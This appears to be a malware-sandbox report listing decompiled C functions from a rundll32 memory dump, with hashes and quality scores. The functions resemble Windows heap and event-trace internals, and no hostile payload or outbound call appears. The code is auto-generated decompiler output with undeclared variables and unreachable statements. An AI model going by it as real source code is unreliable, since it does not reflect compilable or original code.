                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				short _v50;
                                                                                                                				char _v56;
                                                                                                                				signed char* _t18;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr _t30;
                                                                                                                				intOrPtr _t31;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t29 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t32;
                                                                                                                				_v16 = __ecx;
                                                                                                                				_v50 = 0x1c2c;
                                                                                                                				_v24 = _a4;
                                                                                                                				_v20 = _a8;
                                                                                                                				_v12 = __edx;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t18 = 0x7ffe0386;
                                                                                                                				} else {
                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                				}
                                                                                                                				_push( &_v56);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x402);
                                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 769555909888820685baa0a962b82ee0359fd5c20179dd4458f71510b12632a5
                                                                                                                • Instruction ID: 2666ed0596b62548dc2d2754e603c6cb4862437553bde93bbd17cd4952135a47
                                                                                                                • Opcode Fuzzy Hash: 769555909888820685baa0a962b82ee0359fd5c20179dd4458f71510b12632a5
                                                                                                                • Instruction Fuzzy Hash: 0F013C74A00248AFEF04EFB9D545AAEB7B4EF48300F50405AB915EB381EA34EA00DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E044C131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				short _v50;
                                                                                                                				char _v56;
                                                                                                                				signed char* _t18;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr _t30;
                                                                                                                				intOrPtr _t31;
                                                                                                                				signed int _t32;
                                                                                                                
                                                                                                                				_t29 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t32;
                                                                                                                				_v20 = _a4;
                                                                                                                				_v12 = _a8;
                                                                                                                				_v24 = __ecx;
                                                                                                                				_v16 = __edx;
                                                                                                                				_v50 = 0x1021;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t18 = 0x7ffe0380;
                                                                                                                				} else {
                                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                				}
                                                                                                                				_push( &_v56);
                                                                                                                				_push(0x10);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 44d830f0e565437667d65516f1ece4cc5f4074d7e0fc492d217559ba73c823d3
                                                                                                                • Instruction ID: c37b3a84542cffd38e9d6ed33a399a81a7bca9fabd1dec0d17f614ab826020c0
                                                                                                                • Opcode Fuzzy Hash: 44d830f0e565437667d65516f1ece4cc5f4074d7e0fc492d217559ba73c823d3
                                                                                                                • Instruction Fuzzy Hash: 6B018170E00248AFEF40DFA9D505AAEB7F4FF48300F40405AB845EB392EA34EA00CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 46%
                                                                                                                			E044C1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				short _v46;
                                                                                                                				char _v52;
                                                                                                                				signed char* _t15;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t27;
                                                                                                                				intOrPtr _t28;
                                                                                                                				signed int _t29;
                                                                                                                
                                                                                                                				_t26 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t29;
                                                                                                                				_v12 = _a4;
                                                                                                                				_v20 = __ecx;
                                                                                                                				_v16 = __edx;
                                                                                                                				_v46 = 0x1024;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t15 = 0x7ffe0380;
                                                                                                                				} else {
                                                                                                                					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                				}
                                                                                                                				_push( &_v52);
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t15 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ef264ee953db5991796f491a45d42998bf3bc6b2416055bb46c576bd80103ffa
                                                                                                                • Instruction ID: 6558d98d06cf2fbac391a13b00eb5ac4b84fa51c8b896c0d8500cbfaf79bcc00
                                                                                                                • Opcode Fuzzy Hash: ef264ee953db5991796f491a45d42998bf3bc6b2416055bb46c576bd80103ffa
                                                                                                                • Instruction Fuzzy Hash: D4F04F71E00258AFEF14DFA9D505A6EB7B4EF44300F44405AA905EB382EA34A900CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0442C577(void* __ecx, char _a4) {
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t17;
                                                                                                                				void* _t19;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                
                                                                                                                				_t18 = __ecx;
                                                                                                                				_t21 = __ecx;
                                                                                                                				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0442C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x43e11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                					__eflags = _a4;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L10:
                                                                                                                						E044D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                                						L9:
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E044D8D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				short _v42;
                                                                                                                				char _v48;
                                                                                                                				signed char* _t12;
                                                                                                                				intOrPtr _t18;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr _t25;
                                                                                                                				signed int _t26;
                                                                                                                
                                                                                                                				_t23 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t26;
                                                                                                                				_v16 = __ecx;
                                                                                                                				_v42 = 0x1c2b;
                                                                                                                				_v12 = __edx;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t12 = 0x7ffe0386;
                                                                                                                				} else {
                                                                                                                					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                				}
                                                                                                                				_push( &_v48);
                                                                                                                				_push(8);
                                                                                                                				_push(0x20402);
                                                                                                                				_push( *_t12 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E044C2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                                                				void* __esi;
                                                                                                                				signed char _t3;
                                                                                                                				signed char _t7;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t17 = __ecx;
                                                                                                                				_t3 = E044BFD22(__ecx);
                                                                                                                				_t19 =  *0x44f849c - _t3; // 0x0
                                                                                                                				if(_t19 == 0) {
                                                                                                                					__eflags = _t17 -  *0x44f8748; // 0x0
                                                                                                                					if(__eflags <= 0) {
                                                                                                                						E044C1C06();
                                                                                                                						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                                                						__eflags = _t3;
                                                                                                                						if(_t3 != 0) {
                                                                                                                							L5:
                                                                                                                							__eflags =  *0x44f8724 & 0x00000004;
                                                                                                                							if(( *0x44f8724 & 0x00000004) == 0) {
                                                                                                                								asm("int3");
                                                                                                                								return _t3;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                                                							__eflags = _t3 - 3;
                                                                                                                							if(_t3 == 3) {
                                                                                                                								goto L5;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t3;
                                                                                                                				} else {
                                                                                                                					_t7 =  *0x44f8724; // 0x0
                                                                                                                					return E044B8DF1(__ebx, 0xc0000374, 0x44f5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                                                				}
                                                                                                                			}








                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 54%
                                                                                                                			E0444927A(void* __ecx) {
                                                                                                                				signed int _t11;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t11 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                                                                				if(_t11 != 0) {
                                                                                                                					E0444FA60(_t11, 0, 0x98);
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                                                                					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                                                                					E044492C6(_t11, _t14);
                                                                                                                				}
                                                                                                                				return _t11;
                                                                                                                			}






                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0442746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                                                                				signed int _t8;
                                                                                                                				void* _t10;
                                                                                                                				short* _t17;
                                                                                                                				void* _t19;
                                                                                                                				intOrPtr _t20;
                                                                                                                				void* _t21;
                                                                                                                
                                                                                                                				_t20 = __esi;
                                                                                                                				_t19 = __edi;
                                                                                                                				_t17 = __ebx;
                                                                                                                				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                                                                					if(__ecx == 0) {
                                                                                                                						E0441EB70(__ecx, 0x44f79a0);
                                                                                                                					} else {
                                                                                                                						asm("lock xadd [ecx], eax");
                                                                                                                						if((_t8 | 0xffffffff) == 0) {
                                                                                                                							_push( *((intOrPtr*)(__ecx + 4)));
                                                                                                                							E044495D0();
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                                                                							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                                                                							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L10:
                                                                                                                				}
                                                                                                                				_t10 = _t19 + _t19;
                                                                                                                				if(_t20 >= _t10) {
                                                                                                                					if(_t19 != 0) {
                                                                                                                						 *_t17 = 0;
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t10;
                                                                                                                				goto L10;
                                                                                                                			}










                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6e541f6e2a7d103ddd00959d4de16914cba928fbab1ae64014efcea458c9feb
                                                                                                                • Instruction ID: 4924ab76c1105da47210183935da9e45ef1313c859c821018c4bf63ff3651335
                                                                                                                • Opcode Fuzzy Hash: b6e541f6e2a7d103ddd00959d4de16914cba928fbab1ae64014efcea458c9feb
                                                                                                                • Instruction Fuzzy Hash: 1AF0E935A44964EAEF119F78CA41F7A7F71AF04318F94029BD891A7261F764B801C786
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 36%
                                                                                                                			E044D8CD6(intOrPtr __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				short _v38;
                                                                                                                				char _v44;
                                                                                                                				signed char* _t11;
                                                                                                                				intOrPtr _t17;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t25;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_v38 = 0x1c2d;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t11 = 0x7ffe0386;
                                                                                                                				} else {
                                                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                				}
                                                                                                                				_push( &_v44);
                                                                                                                				_push(0xffffffe4);
                                                                                                                				_push(0x402);
                                                                                                                				_push( *_t11 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 25fd506cc87c232d95556f093af95cdbe1e2fa49f2126c745804e953d1e07c4b
                                                                                                                • Instruction ID: de756aafe434b11d894f5ca8fbcde5d2ec7857c5f70defa6eb282f14fc59c5a7
                                                                                                                • Opcode Fuzzy Hash: 25fd506cc87c232d95556f093af95cdbe1e2fa49f2126c745804e953d1e07c4b
                                                                                                                • Instruction Fuzzy Hash: 11F08970A041489BEF04EBB9D955E6E77B4EF44304F50015AF516EB3C1E934E900D754
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04404F2E(void* __ecx, char _a4) {
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t17;
                                                                                                                				void* _t19;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                
                                                                                                                				_t18 = __ecx;
                                                                                                                				_t21 = __ecx;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					L6:
                                                                                                                					__eflags = _a4;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L8:
                                                                                                                						E044D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                                						L9:
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                					if(__eflags != 0) {
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				_t18 = __ecx + 0x30;
                                                                                                                				if(E0442C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x43e1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}










                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 42ca5c3e32fb2bc743d5fc94361ca0eff2d76472ab5d8e5a982fc25b3fcb0e3d
                                                                                                                • Instruction ID: 5de9eb1eb346ad8922ed2148f3bb05c9a83ba8929032f3efd1e517d54033db3b
                                                                                                                • Opcode Fuzzy Hash: 42ca5c3e32fb2bc743d5fc94361ca0eff2d76472ab5d8e5a982fc25b3fcb0e3d
                                                                                                                • Instruction Fuzzy Hash: C4F0BE329266A48FEF71DB98C180B27B7D8AB01BB8F449477D40787A22C734FC80C646
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 36%
                                                                                                                			E044D8B58(intOrPtr __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v20;
                                                                                                                				short _v46;
                                                                                                                				char _v52;
                                                                                                                				signed char* _t11;
                                                                                                                				intOrPtr _t17;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t25;
                                                                                                                				_v20 = __ecx;
                                                                                                                				_v46 = 0x1c26;
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t11 = 0x7ffe0386;
                                                                                                                				} else {
                                                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                				}
                                                                                                                				_push( &_v52);
                                                                                                                				_push(4);
                                                                                                                				_push(0x402);
                                                                                                                				_push( *_t11 & 0x000000ff);
                                                                                                                				return E0444B640(E04449AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0443A44B(signed int __ecx) {
                                                                                                                				intOrPtr _t13;
                                                                                                                				signed int _t15;
                                                                                                                				signed int* _t16;
                                                                                                                				signed int* _t17;
                                                                                                                
                                                                                                                				_t13 =  *0x44f7b9c; // 0x0
                                                                                                                				_t15 = __ecx;
                                                                                                                				_t16 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                                                                				if(_t16 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				 *_t16 = _t15;
                                                                                                                				_t17 =  &(_t16[2]);
                                                                                                                				E0444FA60(_t17, 0, _t15 << 2);
                                                                                                                				return _t17;
                                                                                                                			}








                                                                                                                C-Code - Quality: 79%
                                                                                                                			E0440F358(void* __ecx, signed int __edx) {
                                                                                                                				char _v8;
                                                                                                                				signed int _t9;
                                                                                                                				void* _t20;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t9 = 2;
                                                                                                                				_t20 = 0;
                                                                                                                				if(E0443F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                                                                					_t20 = L04424620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                                				}
                                                                                                                				return _t20;
                                                                                                                			}







                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0441FF60(intOrPtr _a4) {
                                                                                                                				void* __ecx;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				void* _t15;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x43e11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                					return E044D88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                                                                                				} else {
                                                                                                                					return E04420050(_t14);
                                                                                                                				}
                                                                                                                			}











                                                                                                                C-Code - Quality: 82%
                                                                                                                			E044941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t5;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_push(8);
                                                                                                                				_push(0x44e08f0);
                                                                                                                				_t5 = E0445D08C(__ebx, __edi, __esi);
                                                                                                                				if( *0x44f87ec == 0) {
                                                                                                                					E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                                                                					if( *0x44f87ec == 0) {
                                                                                                                						 *0x44f87f0 = 0x44f87ec;
                                                                                                                						 *0x44f87ec = 0x44f87ec;
                                                                                                                						 *0x44f87e8 = 0x44f87e4;
                                                                                                                						 *0x44f87e4 = 0x44f87e4;
                                                                                                                					}
                                                                                                                					 *(_t14 - 4) = 0xfffffffe;
                                                                                                                					_t5 = L04494248();
                                                                                                                				}
                                                                                                                				return E0445D0D1(_t5);
                                                                                                                			}






                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044BD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                				void* _t5;
                                                                                                                
                                                                                                                				if(_a4 != 0) {
                                                                                                                					_t5 = L0440E8B0(__ecx, _a4, 0xfff);
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                					return _t5;
                                                                                                                				}
                                                                                                                				return 0xc000000d;
                                                                                                                			}





                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0443A185() {
                                                                                                                				void* __ecx;
                                                                                                                				intOrPtr* _t5;
                                                                                                                
                                                                                                                				if( *0x44f67e4 >= 0xa) {
                                                                                                                					if(_t5 < 0x44f6800 || _t5 >= 0x44f6900) {
                                                                                                                						return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                                                                					} else {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					return E04420010(0x44f67e0, _t5);
                                                                                                                				}
                                                                                                                			}






                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8a07114ea556efce29931e2335c5967915c3110fa979e4eee16cf13ca62911e1
                                                                                                                • Instruction ID: 7b23c70f5854d6537f225fb0faed6c44ff65258afa40d8dad3a8bf0054efbaff
                                                                                                                • Opcode Fuzzy Hash: 8a07114ea556efce29931e2335c5967915c3110fa979e4eee16cf13ca62911e1
                                                                                                                • Instruction Fuzzy Hash: EED02B211A140026FE1C5711AF18F216252E7C8B1AF310C0FF3432B994DB58FCD68108
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044316E0(void* __edx, void* __eflags) {
                                                                                                                				void* __ecx;
                                                                                                                				void* _t3;
                                                                                                                
                                                                                                                				_t3 = E04431710(0x44f67e0);
                                                                                                                				if(_t3 == 0) {
                                                                                                                					_t6 =  *[fs:0x30];
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						return L04424620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					return _t3;
                                                                                                                				}
                                                                                                                			}






                                                                                                                Memory Dump Source
